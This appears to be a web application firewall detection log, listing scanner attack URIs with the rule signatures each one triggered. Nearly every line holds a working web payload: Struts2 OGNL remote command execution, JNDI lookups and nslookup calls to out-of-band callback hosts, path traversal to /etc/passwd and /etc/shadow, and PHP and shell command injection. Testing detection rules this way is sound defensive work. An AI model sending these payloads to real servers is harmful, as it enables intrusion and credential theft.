Packet [394]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [2 ]	Signatures	[933160]	[944130]
Packet [395]	Uri [/web/?id=nuclei%25{128*128}]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [399]	Uri [/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}]	Nattacks [7 ]	Signatures	[932150]	[933160]	[942260]	[942430]	[942431]	[942460]	[942511]
Packet [409]	Uri [/web/?x=${jndi:ldap://${hostName}.c8ach799m8v918fkv9igcekctjayyyyr1.oast.me/a}]	Nattacks [5 ]	Signatures	[932110]	[932130]	[932160]	[942431]	[942460]
Packet [410]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [411]	Uri [/web/infusions/downloads/downloads.php?cat_id=${system(ls)}]	Nattacks [2 ]	Signatures	[932130]	[933160]
Packet [412]	Uri [/web/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D]	Nattacks [20 ]	Signatures	[920220]	[920272]	[930120]	[932100]	[932110]	[932160]	[941330]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942460]	[942511]	[944100]	[944110]	[944120]	[944130]
Packet [419]	Uri [/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D]	Nattacks [11 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942200]	[942260]	[942430]	[942490]	[942431]	[942460]
Packet [421]	Uri [/web/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [425]	Uri [/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942120]
Packet [426]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [427]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)]	Nattacks [4 ]	Signatures	[933160]	[942430]	[942431]	[942460]
Packet [429]	Uri [/web/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [441]	Uri [/web/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27]	Nattacks [11 ]	Signatures	[930120]	[932160]	[933180]	[933161]	[942110]	[942150]	[942410]	[942430]	[942431]	[942460]	[942511]
Packet [442]	Uri [/web/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D]	Nattacks [2 ]	Signatures	[933160]	[944130]
Packet [453]	Uri [/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}]	Nattacks [7 ]	Signatures	[932150]	[933160]	[942260]	[942430]	[942431]	[942460]	[942511]
Packet [459]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [464]	Uri [/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E]	Nattacks [4 ]	Signatures	[933100]	[933160]	[933190]	[942460]
Packet [469]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd]	Nattacks [3 ]	Signatures	[930110]	[930120]	[932160]
Packet [471]	Uri [/web/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [475]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)]	Nattacks [4 ]	Signatures	[933160]	[942430]	[942431]	[942460]
Packet [477]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)]	Nattacks [4 ]	Signatures	[933160]	[942430]	[942431]	[942460]
Packet [485]	Uri [/web/webadmin/script?command=|%20nslookup%20c8ach799m8v918fkv9igcekctkoyyyyg4.oast.me]	Nattacks [2 ]	Signatures	[932105]	[932110]
Packet [490]	Uri [/web/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D]	Nattacks [2 ]	Signatures	[933160]	[944130]
Packet [507]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [508]	Uri [/web/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [509]	Uri [/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [510]	Uri [/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E]	Nattacks [4 ]	Signatures	[933100]	[933160]	[933190]	[942460]
Packet [514]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd]	Nattacks [3 ]	Signatures	[930110]	[930120]	[932160]
Packet [515]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release]	Nattacks [1 ]	Signatures	[930110]
Packet [516]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license]	Nattacks [1 ]	Signatures	[930110]
Packet [517]	Uri [/web/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [533]	Uri [/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [534]	Uri [/web/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [535]	Uri [/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [537]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license]	Nattacks [1 ]	Signatures	[930110]
Packet [538]	Uri [/web/hsqldb%0a]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [545]	Uri [/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [546]	Uri [/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [547]	Uri [/web/hsqldb%0a]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [555]	Uri [/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [14 ]	Signatures	[932130]	[933161]	[941340]	[942200]	[942260]	[942370]	[942430]	[942440]	[942431]	[942511]	[944100]	[944110]	[944130]	[944250]
Packet [556]	Uri [/web/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [13 ]	Signatures	[932130]	[933160]	[933161]	[941340]	[942200]	[942370]	[942430]	[942440]	[942431]	[944100]	[944110]	[944130]	[944250]
Packet [557]	Uri [/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [13 ]	Signatures	[932130]	[933160]	[933161]	[941340]	[942200]	[942370]	[942430]	[942440]	[942431]	[944100]	[944110]	[944130]	[944250]
Packet [562]	Uri [/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [13 ]	Signatures	[932130]	[933160]	[933161]	[941340]	[942200]	[942370]	[942430]	[942440]	[942431]	[944100]	[944110]	[944130]	[944250]
Packet [563]	Uri [/web/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [13 ]	Signatures	[932130]	[933160]	[933161]	[941340]	[942200]	[942370]	[942430]	[942440]	[942431]	[944100]	[944110]	[944130]	[944250]
# N. packets [565], [135] with alerts, N. Alerts [682]
